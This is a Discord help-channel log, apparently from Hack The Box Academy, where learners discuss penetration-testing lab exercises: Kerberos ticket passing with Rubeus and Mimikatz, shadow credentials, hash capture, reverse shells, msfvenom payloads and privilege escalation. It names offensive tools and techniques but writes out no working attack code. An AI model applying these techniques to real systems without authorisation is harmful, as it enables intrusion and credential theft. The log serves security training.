then it doesnt show me again the command type bar thingy, to write again i gotta press ctrl+c
then move on
Connection to 80 port [tcp/*] succeeded!w
+OK Dovecot (Ubuntu) ready.
139 port [tcp/*] succeed
143 port [tcp/*] succeeded!
- OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LOGINDISABLED] Dovecot (Ubuntu) ready.
port [tcp/*] succeeded!
31337 port [tcp/*] succeeded!
SIR YES SIR, idk what to do now
is it the port 143 my flag?
did you wait for 31337?
bruh
3 whole hours and i had to wait 10 seconds on a port ive already scanned
thank you for being so patient with me lattice
see ya @safe star
I solved my problem in the first question of the skills assessment, which was a mistake on my part in the format to be returned. All that's left is the problem of the build number.
can you guide me a bit?
Is anyone able to give me a nudge for the final question of the skills assessment on dacl attacks 2? I've missed something in my enumeration and I've spent a week trying to identify where the gap is. A point in the right direction would be appreciated.
Yes no problem, in the first question of the skills assessment the answer must be given in the format /firstFolder/SecondFolder/appFolder and above all do not add a / at the end.
The path is also listed in the “Android Debug Bridge” section.
I hope it's a bit clearer
Nudge would be great 
@night escarp yeah it made situation clear
could you please help me with this?
google variable scopes or read the section carefully
I already did it
Btw I was doing completely the same just was missing com in the beginning
did you find the uid of the application in the second question?
yeah, did you run the ls -l command on the com.android.settings full path ?
I had mistakes cause i was missing com as well here will try once more now
@cunning obsidian
The basis of the path is the same as in the previous question
yeah i got it and I got the output now and what is uid I have to insert only numbers?
system and numbers or there is a need to pull the file?
just system is fine 🙂
yeah done
the third question where to find the build model?
what do they mean in it?
do they mean code template which opens when i run device?
it's literally the same thing as for the build number question, but here it's the build model (first part of the text in the build info of your emulated Pixel 3a).
It asks you to create the app, but if you're lazy you can just look at the build info directly.
they mean name of the device right?
exactly
yeah it worked
I tried to sign the application as they showed but it throws me a mistake all the time I went to build and tried to generate a bundle and was getting mistakes all the time
in the last question
I also had problems, I was able to solve them by googling “how to manually sign apk's” and I found a medium blog that explained well using jarsigner.
will check tomorrow I btw checked this application in one service and it says it has some bugs in the code or something cause android studio is refusing to read this application
thank you so much for guiding))
Hey guys, I'm currently going through the Password Attacks module, specifically the Pass the Ticket (PtT) from Windows section. At one point, we're shown how to convert a .kirbi file to Base64 format to use with Rubeus, instead of passing the .kirbi file generated by Mimikatz.
Is there a practical reason for doing this, or is it just to demonstrate that it works?
Are there situations where Rubeus can't read .kirbi files directly and we can’t dump the Base64 tickets, leaving us with the only option to convert the file first?
I understand we could reduce the forensic footprint and avoid file-based injection by passing the Base64 key directly, but that would only make sense if we don't generate the .kirbi file in the first place, right?
Am I missing something, or was it indeed just for the sake of the demonstration?
I’m aware it’s a Tier 1 module, but I don’t think I’m giving up too much as it's more of a tangent. If I am, please feel free to delete. 😅 👌
Normally you don't need to put it in android studio but if you prefer
No prob :), ping me gladly if support answers your question about the build number.
can i add you to friends? cause it will be easy to ping
I usually use the base64 on Linux with ticket converter if I can’t transfer the kirbi file easily
🙏🏻🙏🏻🙏🏻
I can't write there
I provided instructions on how you can reach the channel in the post you're responding to.
I see , i don't have a htb acc
Then you'd need to create one.
My country is banned
but maybe you can help me, a good deed is always valued. Can i ask u the question privatley?
No, sorry, you'll have to reach out to support on the site. Nothing I can do.
Ok🙏🏻😕
I am stuck on AD Administration: Guided Lab Part II.
I can't rdp to ACADEMY-IAD-W10. It said the credentials for use to login:
User == image
Password == Academy_student_AD!
I don't think the credentials are correct.
https://academy.hackthebox.com/module/74/section/1393
ensure that the password is between single quotes: ' as the ! is a function in bash
Either that or alter your network interface MTU
But I can login to ACADEMY-IAD-DC01 with credentials htb-student_adm: Academy_student_DA! (without any single quotes). I just don't believe the username for ACADEMY-IAD-W10 is image.
Only module help here
Labs = #boxes or more recent ones like #1360673885376483378 have a dedicated channel. Get access by verifying your account
Hi everyone, I guess new module is dropped by HTB Android App Static Analysis
I'm currently on the nmap module and having an issue submitting the answer. I know the answer is correct but it's not accepting my answer. Can someone troubleshoot this?
check for spaces before answer or appending spaces (mostly its coz of that)
Already checked that. No spaces.
whats the submodule? and question no?
Nmap Scripting Engine
Question: Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer
Module (Command injections) {Evasion Tools}
not getting bashfucator.sh nor /bin folder (in /bashfuscator/bin/) for some reason
P.S - Followed module steps and installed properly
This module is in the cpts course
did u try nmap script?
Yeah, I found the flag. When I input the flag for the question, it's not accepting it
is your flag in this format ? - HTB{flag_value_here}
Yes
dm@weak epoch
I just finished the "Setting Up - Linux" portion of the Infosec Foundations module. Now I'm on the Windows setup section. I am confused on how to proceed. Will I be getting a new ISO then booting up a new VM just like in the Linux section? This link https://developer.microsoft.com/en-us/windows/downloads/virtual-machines/ was introduced in the instructions but it appears there is an ongoing issue "Due to ongoing technical issues, as of October 23, 2024, downloads are temporarily unavailable."
Should I install everything manually? Ty in advance
it's not written poorly, at all, it's bouncing between them to show how to perform the same queries across the different implementations (mssql and mysql) to show syntactically how to query in each
afaik that download has been down for a while, you can just create a windows vm from an iso image
/feedback if you have an idea on how it can be better; but most people don't have the issues that you're stating are there. maybe it's just not structured in a way that works for you
i.e. start with one mssql => discuss enumeration/etc; then mysql => discuss enumeration/etc.
Hi guys, im currently on AD Enumeration & Attacks - Skills Assessment Part I
||i have question about the "Find cleartext credentials for another domain user. Submit the username as your answer."
I've rdp to the machine, running mimikatz and dump logonpasswords but i cant seem to find the clear password :/||
try multiple different techniques; but iirc sometimes it's staring you in the face and you overlook it
Alright.ty 🙂
Guys, I got stuck on the last question in Android - Sign the application myapp.apk and install it by either dragging and dropping it onto the device or using ADB. Make sure to first uninstall any previous versions of the app. After installation, tap on the app to start it. What is the message printed on the screen?
I loaded it on a virtual drive, but the text it gives when it starts is not the correct answer. Can anyone share some guidance?
Theres a registry setting you have to change to get it
You have to restart the machine for it to apply
Hello colleagues I have a question in the cross site scripting module in the phishing section I have a vpn connection file I do not understand why at the bottom I have another file if I have the academy-regular.ovpn and the help indicates that the key is already installed in the workstation.
the availability to download the vpn connection is just there; you don't have to download it again or anything like that
Is it only to reinstall the file and connect?
"reinstall" isn't really the right word tbh
as it's not really an "install" file
it's just a configuration file
it's just to be able to download the file again/change vpn regions
I am doing the exercise as indicated in the phishing section in the XSS module but at the time of sending the url in phisnihg/send.php tells me that there is a problem to send it, I try it in another browser tab and I can view it normally then send the credentials if to see if I can capture and display them in the file creds.txt, the issue is that when I send it tells me that there is a problem and does not send me the credentials to access the flag.txt
This may not be the channel for this but I was wondering if HTB was looking into an exploit development certification.
This is already available for web exploits.
Certified Web Exploitation Expert (CWEE)
I meant along the lines of say an OSED or OSEE type of exam. I should've been more specific.
Take a look at the modules in the Academy.
A job role path for AI Red Teamers has already been published. More modules are sure to follow.
Several modules on WiFi hacking have also been created and published. There may be a path for this soon as well.
Additional modules for Blue Teamers and, new, modules for Android hacking have been published.
I haven't seen any modules for something like OSED lately. But that doesn't mean there won't be something like that at some point.
There's buffer overflow and assembly modules so the capability is there to make an exploit development style exam.
Hi. I have a question about publishing some content of the modules.
I'll provide some context.
I want to have a website for all of the documentation of all the Courses / Projects I make, no matter the platform.
I've started the module "Introduction to Active Directory", and as documentation, I'll probably want to copy and paste some of the content of the module, not everything obviously.
As my documentation will be publicly available, am I allowed to do what I mentioned (copy and paste some of the content)?
I hope some mod / admin can answer this to be clear.
Thanks!!
Have a good life...
You can publish only module of the first level if you publish something higher htb will block your content
These modules were published between the end of 2020 and mid-2021.
Is leaking the modules legal?! 🗿
Well, the contents of the modules are protected by copyright and may not simply be copied and published. An exception may be made for some Tier 0 modules. Please contact support.
I did that, while I wait for its response I asked here
Most of us mods are not HTB staff, but volunteers. 😉
no
// why I can't reply at general chat ?
Gotta identify your account, instructions --> #welcome
You can publish walkthroughs of Tier 0 modules. However, you cannot publish the module content itself.
thanks for clarifying i knew that one could publish walkthrough but not the content itself but didn't remember what tier
Anyone knows why that is happening ?
I even restarted both the Pwnbox
and I restarted the Target(s): 10.129.78.33 (ACADEMY-EA-MS01)
Nothing really works....
I'm working on "Attacking Session Tokens" in the "Broken Authentication" module. I'm trying to get the application to issue me multiple session tokens, but I'm only ever able to get it to issue the same thing over and over again. I'm just logging out and back in a couple of times.
I can only ever get the same session token out of this web app... I have no idea what to do with that.
Hi. I have just finished the AD Enumeration & Attacks module, great stuff. The thing is that I couldn't understand why the first (||AB920||) user's hash could be captured using ||responder||, but not the third (||CT059||) user's hash. For that one I had to use ||Inveigh|| from ||MS01||. What's the difference between the tools?
I am stuck at the skill assessment of the File Upload Attacks can anyone help
Anyone at the level of solving the bug bounty path? lets talk and solve collaboratively
Inveigh is typically used when you only have a windows host. In your case the MS01 host. Since nothing was talking to your Linux jumpbox you couldn’t capture that hash. But since things are talking to your MS01 host. Inveigh could do its thing.
in the easy ips firewall lab, i tried finding the OS "Our client wants to know if we can identify which operating system their provided machine is running on. Submit the OS name as the answer."
I think i found it but its not correct help
Hi I found the module HTTPS/TLS Attacks -> Padding Oracle Attacks -> What is a Bleichenbacher attack? super interesting!
To understand the attack better, I wanted to create my own lab machine, however I've been struggling to create a setup that's vulnerable. After reading the paper, it seems openssl is not vulnerable to the attack.
Can anyone point me towards how I can setup my own lab machine that is vulnerable to the Bleichenbacher attack?
My current idea is to write a TLS server in a vulnerable Erlang version, however that seems like a lot of work and I wonder if I can have it simpler.
It makes sense. Thank you
I might just never have noticed this before the Academy module "Linux Privilege Escalation", but does the Bash terminal (on PwnBox?) go "deaf" if the host I'm ssh-ed into times out? As in, I cannot type anything anymore (not even to just "exit" to go back to my main shell), so I have to close the window and open another terminal. Time-out is my guess because I have to "spawn target system", which might also be because the targets in the sections vary from time to time
might be better to base64 atp
This way should technically work also, no?
Yeah probably but it way harder to find errors
But yeah if you want the challenge go for it
I’m okay Josie, don’t want to join your kink cult
Never that, you should join and find instead of judging off nothing
also i think this falls apart at the pipes
hello
Hmm, maybe. I’ll try to encode it later. Too tired right now
AND GOODBYE
yeah it only runs the find command but you cant really pipe to grep
Noted for next time, thank you
Don't advertise here.
No. This discord isn't about that it's about Hack The Box's various platforms.
edge lord
I need help on file upload attacks skills assessment idk, its get request i dont even see the file content i am uploading i don't get how it works
any hints
You can DM how you executed it, but it shouldn't be anything crazy.
Were you ever able to figure this out? I am getting the same error and have tried reinstalling everything i can think of, chmoding to add permissions, copying all of the needed files to a working directory...still stuck.
Try running with sudo
i've tried running everything with sudo. i've moved all existing files to backup and reinstalled everything. this oracle tns module is very frustrating.
Instead of the apt install, install from source
Idk if the section still has the instructions for it
I've used the script provided that included cloning the git, but it's somehow not resulting in it actually getting installed. i really am not sure. I've now also cloned from the git directly, still no joy.
Hello all. I am currently stuck on Web Attacks - Mass IDOR Enumeration
As I am following along, no matter what I do I can't seem to get another uid to show other files, and the files that are accessed by default are empty. Not sure what to do
Hi,
in the code analysis section of the intro to malware analysis module.
how did we know that HKLM is being pushed to rcx? and isn't rcx supposed to pass the 4th argument ?
http://6.s081.scripts.mit.edu/sp18/x86-64-architecture-guide.html
depends on the calling convention
i think majority of winapi functions go from right to left
thx for the info, i also found this comment regarding the order of the registers
https://www.reddit.com/r/asm/comments/1g0j2m6/comment/lr956dh/?utm_source=share&utm_medium=web3x&utm_name=web3xcss&utm_term=1&utm_content=share_button
https://learn.microsoft.com/en-us/cpp/build/x64-calling-convention?view=msvc-170&viewFallbackFrom=vs-2017
but about the values, I'm still not sure how do we know that HKEY_LOCAL_MACHINE is being pushed to rcx.
thats just the value each registry key has
thanks for the help <3
i understand it now
I am doing socat redirection with a reverseshell section and it says it started reverse handler. However, I don't see a connection establishing. is there a reason for this? It said started a reverse handler. Does that mean it connected and I did the section right?
and why is a shell not loading?
the tool used on the target I'm logged into via SSH is working
there's no error it says "started reverse handler" but no shell loads I just end up sitting there waiting for a reverse shell
I have a screenshot if someone wants to see. I can show you there's no error.
but no reverse shell
hold on wait I think I know what to do
no wait that didn't work
I checked on the target host and the payload didn't download
so I'm thinking I did something wrong
Anyone who has completed the Windows Lateral Movement. How did you complete task 2, "what's the content of the flag located at C:\users\arturo\flag.txt"
I've got a rdp to the jump host going and I think I'm supposed to get into wsus.inlanefreight but it's blocking all connection winrm, smb etc.
I am stuck on this : an Android question in the academy : "Applications created using frameworks like React Native, Apache Cordova, and Ionic might also be susceptible to what type of attacks, compared to native applications? (Format: 1 word) " tried everything, likely a caps issue, any clue for the direction ?
Quick question. How come I have unlimited instances even though I don't have an active membership? I mean, I like it and it’s very helpful, but I’m just curious.
because you gave HTB money at one point in time
Yes, many times
Alright, this makes sense
that's literally the reason
sorry if that came off a bit cheekier than intended
you'd have unlimited iirc if you bought cubes, for example
No worries at all. I appreciate your quick response as always 🫶
Haha, how are you? Do you remember me?
Honestly, and sorry.,. but I cannot
I'm ok thank you, how're you?
I'm terrible with names and faces most of the time
Some stick, some just don't
Please don't take it personally 🙂
We talked 2 or 3 months ago. I even added you on LinkedIn. Back then, you said you’d ask a colleague out of curiosity about what happened to GHS, the Greek Hacking Scene. I’ve been offline for a while due to too much work and a recent promotion, but now I’m back and working on getting my CPTS.
For the prompt injection attack - skill assessment just got the flag. If anyone is struggling, feel free to DM me 😄
Ahhhhh, I did check my DMs but nothing came up
Yes, ch4p did respond, one sec
Didn't say much though
Haha no worries, it's normal, you talk with thousands of people here ❤️
He said he knew some of the pf guys.. then said a name.. then said that wasn't the name.. then said whoever it was used to organize AthCon.. then said they'd find the name
...then nothing after that
🤣
No worries, hope all is good your end 🙂 Happy east if you are celebrating
..er
Easter
Same to you! Everything is fine, thank you, hope the same on your end! Finally I've got the time to study ❤️
I moved to the InfoSec team in my company with a focus on AppSec and pentesting, so I definitely need the knowledge of CPTS and the certificate itself

Awesome 🙂 I gonna go get some lunch/breakfast/whatever, back in a bit. We can swap to #general to keep this channel on topic if we hook up later. Have a good one 🙂
Enjoy! Clear!
- In the module they talk how you can also use IPv6 instead of IPv4. 2. Maybe the port is different from the default one and maybe it was shown in module itself.
I've been using linux for a few years (also to manage a homelab) and decided to try academy, much on the command line and am surprised that I still learned quite some commands/concepts in the linux fundamentals course, it's not just a course where the free module only teaches cd, ls, cat etc
Hi. i am stuck at this question on the HTB android fundamentals and would appreciate some help for this question.
question: "What is the name of the function that returns the string inside the cpp file? (Format: FunctionName())."
I answered "stringFromJNI()" but it's wrong.
Read #welcome and then ask in #careers-and-certs
did u find solution
hey im stuck on pivoting from srv02 to dc01 in winrm module
im generating a new ticket with rubeus
but no luck
Can try the part in that section that covers winrs.
@gray yacht
You can just DM
kk
can someone help me? im on the IDS IPS evasion module - easy lab
I have PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
10001/tcp open scp-config
and need to figure out what operating system the machine is running, i tried an nmap scan with -O and checked the packet tracer on the port 10001 but i cant seem to figure it out :/
In the attacking common services module it says "If we get administrative privileges on a machine, we can extract the SAM database hashes"
but in a diff module it says only SYSTEM level privileges can access the SAM database
sooo which one is it? it also makes it confusing bc idk what's true
Sometimes services may reveal stuff within their versions
i passed that already
THANK YOU SO MUCH FOR THE RESPONSE
im on the hard lab now and... let's just say it lives up to his name
It's easier than you think; reread the related section and look around for stuff related to source port
The section related to the name, ids/ips evasion
It's like a 10 minute timeout (or you can just reset the lab)
yeah thanks a lot!
Hello
I have been stuck on file inclusion skills assessment for quite some time now
I tried:
Bypassing with basic methods (..../ etc') and encoding the payloads.
Bruteforcing parameters but didnt find anything other than the page value.
running http server on my host and include the URI in the web parameter but also didnt get any response
Also tried using PHP wrappers to get a web shell
Can i get a nudge?
Guys I am on /module/147/section/1322 and I don't see where is this password for Kira?
I believe you obtain it from a previous section
It says use the "cracked password for Kira" but it is nowhere to be found.
Alright thanks, I will have a look.
I did CTRL+F and it doesn't say Kira anywhere
well you get the pass somewhere in the module, i don't remember exactly which section
Ok what about this section /module/51/section/1777, I am inputting the Python version as I see it on the box and it won't accept my answer.
And the answer is as clear as day on the machine
I tried it PythonX.X.XX and I tried it X.X.XX and even X.X but none of those answers worked.
I even tried pythonX.X too and still the same problem.
Never mind
Hello everyone.
I completed the module Android Fundamentals but in the Application Frameworks section, there's the last question which I honestly can't find the answer in the section itself.
The question is: "Applications created using frameworks like React Native, Apache Cordova, and Ionic might also be susceptible to what type of attacks, compared to native applications? (Format: 1 word)"
I'm also not sure about the format, do I use a literal number 1 or does this mean exactly one word and nothing more? Reverse engineering is the term that most shows up but I've honestly tried everything in the section. Is the answer in another section I might have missed? Thank you guys.
where is the open option in Exploiting Web Vulnerabilities in Thick-Client Applications: Clicking on the FileBrowser -> Notes.txt reveals the file security.txt. Literally no button for that
Did it long time ago, but right click? Sorry if that doesn’t work
Nope this is soo stupid
hi friends i'm new to this and on the module for infosec in the knowledge check. i got my foothold and found the users.txt file and i need to privesc. i did sudo -l and shows php can be run with sudo privs. do i do a php file upload am i on the wrong track?
A few days ago i reached the end of the CPTS path. Just wanted to say thanks to all the community in here!
Whenever i had a question, i could find the answer in here.
Right now im preparing to take the exam first week in may! Looking forward to it.
Thank you once again.
you're gonna kill it i believe
anyone know this?
nvm i used gtfobins thanks team
The module itself is a walkthrough. You can check out a similar machine by ippsec on the same. That might make it more clear
so the open button is obfuscated I'm confused this is a simple instruction: "We can read its content by clicking the Open option at the bottom of the window."
There's no open option in my box
did you have a open button when you did this lab?
Yeah
was it hidden at first?
I have forgotten. I checked the walkthrough by 0xdf and he seems to be having that option. I don’t know if I can paste links here
Does a high school email count for a student plan
Make the window bigger
Reach out to support
I'm in shells & payloads - the live engagement. After creating a payload with msfvenom, it's created as a zip archive with many files and folders inside. Which one of these am I supposed to use?
hi guys, I mentioned an issue I had earlier last night I'm wondering if anyone could help me out with this right now. I have a screenshot to prove no errors.
but I can't post here without spoiling
The whole archive is the payload
It doesn't have to be deflated?
Spoilers
But google what the file extension stands for.
But also: make sure the LHOST is correct, you're on a foothold machine after all
thanks
In the Linux Privilege Escalation module, I was trying to download an exploit on the target I was ssh-ed into straight from git using "git clone https://github.com/[full URL]"
I got the error "fatal: unable to access https://github.com/[full URL]: Could not resolve host: github.com"
I found the source code for that exploit elsewhere and just created a new file, but was wondering why git didn't work here?
Not sure if I can post the specifics here as it was part of the exercise
The targets don't have internet access
wait, for real? ^^'
hold on, actually according to the writeup it WOULD have worked with wget, but a different URL
wget https://raw.githubusercontent.com/[full URL]
You download to your machine then transfer to target
Oh right!
Yes, my bad, that download happened outside of ssh..."download to the attack host", would help if I could read xD
Well, copy paste worked as well 😅
@fathom pendant I've tried making my lhost the 172.16, and the 10.129, I get the same error page for both: HTTP Status 500 – Internal Server Error. Nothing connects to my listener on the foothold machine.
172.16 seems to make more sense since it's the same subnet as the target.
Hey guys I'm stuck on the file inclusion module, the lfi and file upload section, I found a way for RCE but I can't read the flag, I found the answer online but idk how they get it, I can do RCE but when I cat the flag nothing want to be displayed (yes the file name is good) any help?
hi so can no one help me with the section I'm working on today?
I understand its Easter but should I come back tomorrow?
Honestly you shouldn't rely upon the help of others when working through modules
Someone may help, they may not
Ultimately the purpose is to work through it on your own, but some may reach out to provide a nudge or gentle guidance
I know. I have been. Ok I will just come back to it when I have more energy.
So tomorrow I will try again. But ya point taken.
I will just keep trying to complete it on my own.
It feels like one of those things where I'll keep trying and suddenly see it a few days later so ya.
I may just reread all of the previous sections in this module. Its been a while since I did them.
What do you mean "hung up?"
Your brain will keep on working, even if you're not focusing on it
As in.. if you feel like you're getting nowhere, keeping on trying even if you're not moving
Better to put it aside and go for something else
Let your brain work on it, while you work on something else
Ok. Agreed. Will do that.
Ok, so would it be better to work on something else today then tomorrow reread the previous sections in the module and take notes again tomorrow?
I already have notes but I just I want to understand it. This feels like something where when I understand what I'm doing I'll get it.
What you trying to do?
this one section in Socat Redirection with a Reverse Shell section. I answered the true or false question already but I want to follow the instructions in the section to replicate the attack they are giving me and I'm having trouble.
I think I am gonna take g0blin's advice and try again tomorrow
I think this is some easy thing where once I understand what I'm doing it will click.
there's a lot of factors like is there a firewall between you and the machine are you forwarding from HOST A -> SSH -> to your machine ?, if its just ssh -D 1080 should be enough, but tunneling should always check if you can reach those ports like your socat from HOST A should be redirecting to the SSH ip and not your BOX IP because think of your jumping host (SSH server you compromised) as a router
@zinc swift please don't post flags
sorry i didn't know. what part am i supposed to submit from that because it's not taking my answer
nvm i eventually got it deleting stuff
HTB{randomstuffhere} for my own future references thanks team
Okay, yeah format should be like HTB{xxx}
like think of subnets as houses and LAN as rooms in this houses to access this LANS you must ask the landlord to get you there
Discuss all modules here, from the fundamentals to the really mentals, but do not spoil module content over Tier 0.
That kinda thing
😄
What host is running "Microsoft SQL Server 2019 15.00.2000.00"? (IP address, not Resolved name) from the Active Directory Enumeration&Attacks(Initial Enumeration of the Domain)...i only got 2 live/active hosts but none have that service...any idea of what/where i might be mistaking?
Did you try all the various methods they showed?
Yes i did all from their examples
You could restart the target or change servers/regions if you think it's the target.
Make sure you are following all of the instructions for finding hosts, sometimes there is key information you may miss. Maybe give the section another once over.
is it possible to use a ticket in my session to use whisker again?
like lets say i use asktgt to get a ticket as a user and i want to then use whisker
so attack using my kerberos ticket
i just finished the LFI skills assessment and my god that was hard
Something weird happened with one of the files but after i restarted it worked
anyone know?
You need system rights but very often Administrator has SEImpersonate anyways so Admins usually can just dump them (given you impersonate System)
also SAM is only for LOCAL accounts
You want to run a Shadow Cred twice with different users, is this it?
kinda
it doesn't really matter
im user A and i asktgt /ptt as user B
can i do shadowcreds as user B
or does whisker not utilize kerberos tickets like that
This
Most of Windows Tools will use Kerberos tickets to list your permissions
You can run Rubeus to gain a TGT as whichever user you need and then run Whisker as this user
yeah but it didn't work today i had userA -> genericall -> userB -> addcredentialkey -> user c
i did whisker -> rubeus tgt then -> whisker to user c
it did not allow me (access denied)
What exactly did you attempt running?
Cause with the GenericAll you can change user B password and start a CMD session with “Run as a different user”. Then run Whisker on user C.
i mean with the hash i can do a lot of things, i ended up just using pywhisker with the hash and it worked
but i thought it was annoying that it didn't work with rubeus asktgt /ptt
Totally understand. Hate pywhisker. You can run Certipy’s shadow auto. It will do stuff easier
Hello, I was doing Session Security module
and I am confused about this question in section Cross-Site Request Forgery (GET-based)
The scenario which we saw in this section INCLUDED a CSRF token
but this question suddenly ignores that thing
and assumes that there is no CSRF token being used.
(Because if CSRF token was being used in a SSL encrypted request, we can not sniff it)
They should have mentioned this in the question that it is assumed that the request does not contain any CSRF token.
If you feel there’s a mistake, please post in #1234357888114364508
Hello, my dear friends,
My name is afzal and I'm a student of computer science and engineering,
And I want to start a career in pentesting ,
But I don't know where to start, i know all concepts of networking and I know some bug bounties and currently learning bug bountie,
And I need a course that can make my future career good in pentesting but for free because as a student i can't afford any course, so plz help me my seniors,
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Student sub is $8 per month. That’s nearly free
If you wanna be a Pentester, one needs to know how to google
Yeah I know,
It’s simple as “hack the box student subscription”
How can someone "Know all concepts of networking"?
For instance, do you know ipv5? 
As I remember when I was learning networking i search for it like 2 years ago and I think it's just an experimental ip and currently not in market
Just saying it's literally impossible to know everything about a single topic
Yes
But it's entirely possible to make up bullshit on any topic
😛
Anyway, all good
Just made me chuckle
Hi everyone, I'm currently working on the Using Splunk Apps module, but I don't get how the answer is 6? I've used CommandLine and OriginalFileName using the SharpHound.exe but I only got 1 and 2 respective entries for it.
hey guys im not sure where im supposed to type this or tell someone but the Vaccine box reverse shell kept breaking even after proper TTY upgrades. Might be worth reviewing the stability or setting it up for SSH earlier.
not trying to cause problems or break the rules
awesome thank you
I've seen several people stuck in a similar spot. Can anyone provide a nudge on moving forward. I can see which linker you need, and I can see a chain that gets to that account, but I can't start it.
why modules have such misleading questions?
misleading in what way?
could always mention ways to improve /feedback
Oh man. Thanks a tonne, but I posted after being stuck on this like the whole day. And right when you messaged I think I found the path lol. I owe you one.
Ok np man, good job.
And I just completed the whole assessment. I feel like the hints for 2 and 3 were around the wrong way? Could well just be me tho.
Could be yes, its been a while I did those.
hi guys how can i send messages to general
read and follow #welcome
Hey, i am on password attacks, PTH section, question 4.
I did pth with mimikatz on the user david with his hash and it spawned a new command prompt on the user Administrator, not on david for some reason. then I tried to use evil-winrm and I connected successfully to david's user but I cannot access to the shared folder DC01
when I use CME with david's NTLM and add the --shares option I cannot see the DC01 shared folder.
I looked at the solution and it shows step by step exactly what I have already done.
What am I missing ?
can anyone help me out on "introduction to NoSQL Injection at Skills Assessment II"?
just need some pointers, thank you!!
DM me
In addition, when im trying to read the flag on the spawned shell w user administrator i am able to read the flag. I am just wondering why when running the CME with the --shares flag doesn't show me the DC01 shared folder.
Let's say they wouldn't provide me the DC01 shared folder, how could I find it?
DC01 isn't a shared folder, it's a device on the internal network
//DC01/ is a device (the DC) on the internal (172.16.x.x) network of the box, the reason it doesn't show with CME is that it's not a share on the lab itself (10.129.x.x)
Might be a bit of a dumb question - working on PW Attacks - Credential Hunting
Copied Lazagne over to the Windows host - but I can't get it to run, can't find the exe unless I'm missing something but some help would be greatly appreciated!
Hii
did you check C:\tools or /opt ?
Copied the folder directly to the Desktop - still nothing
Also pulled the folder straight from the github page too
C:\Tools isn't a directory either
just grab a copy off the interwebs then
That's what I did - just not compiled, I'll have to do that which is fine
hi guys how can i send messages to general
Verify your account by following the steps outlined there
.....
I mean, everyone's gotta have personal goals
If that's yours, cool
mcdonalds soda machine pentester
God knows they break often enough
Maybe you can fix them
Anyway, this is the modules channel. Take this to #general please.
Hi guys, did someone here finish the Advanced XSS and CSRF module and can help?
Hello guys, I'm running into an error trying to install crackmapexec on parrot OS. If i use python3 -m pip install or pipx install or pip 3 install, I get the same "externally-managed-environment" error. I've also tried "apt install python3-crackmapexec" and still am getting an error saying that "Depends on python3-neo4j but it is not installable"
try installing NetExec with pipx
What's the reason I cannot write in general server
Under which path are these modules?
the cwee
I'd advise re-reading the content @frozen stone
Be cautious accepting advice from people you do not know.
Could be that you missed something.
@dark hedge :
Fatal error from pip prevented installation. Full pip output in file:
/home/nick/.local/pipx/logs/cmd_2025-04-21_09.50.14_pip_errors.log
Some possibly relevant errors from pip install:
ERROR: Could not find a version that satisfies the requirement netexec (from versions: none)
ERROR: No matching distribution found for netexec
I got the above when trying to do it
read the documentation
Reason? First time I hear. Lol
Exactly
Just abundance of caution
New users offering assistance just looks quite odd.
Nothing personal.
hello, ive completed the infosec foundations path i mean almost all of it, but the thing is i was told the path is completely free but to me it seems like i still need 20 more cubes to unlock the bash scripting module
i didn't purchase any extra module
here are my owned modules
these are modules from the infosec foundation path
if the path is free then i should be having enough cubes to unlock the module
but i lack 20 cubes
the path is mostly free
not full free 🥶
well does that mean i need purchase cubes to unlock bash scripting?
yes
i thought tier 0 modules were free and they give back all the cubes you spent
welp gotta spend 5$ now ig
bash scripting isnt tier 0 😔
yeah
just saw
so after completing the infosec path without the bash scripting module. it's normal to have 30 cubes left?
i think so
I'm always curious.
If I'm good at cbbh , can I do CTF challenges and boxes with less learning curve.
How steep is the learning curve for someone with no ctf experience yet have cbbh
i have a question but i cant type in general for some reason
Im new to HTB and Im trying to do a challenge it requires a download and has a password
how do I start it im a bit confused
nvm, i am just gonna buy student sub
Read and follow #welcome